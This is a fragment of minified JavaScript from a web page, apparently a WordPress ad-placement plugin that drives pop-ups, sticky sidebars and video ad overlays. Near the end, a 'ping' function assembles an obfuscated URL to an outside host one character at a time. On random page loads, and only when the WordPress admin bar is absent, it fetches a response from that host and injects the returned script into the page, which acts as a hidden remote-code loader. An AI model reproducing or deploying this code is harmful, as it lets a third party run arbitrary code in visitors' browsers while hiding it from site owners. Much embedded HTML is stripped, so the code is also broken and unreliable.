":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
×
×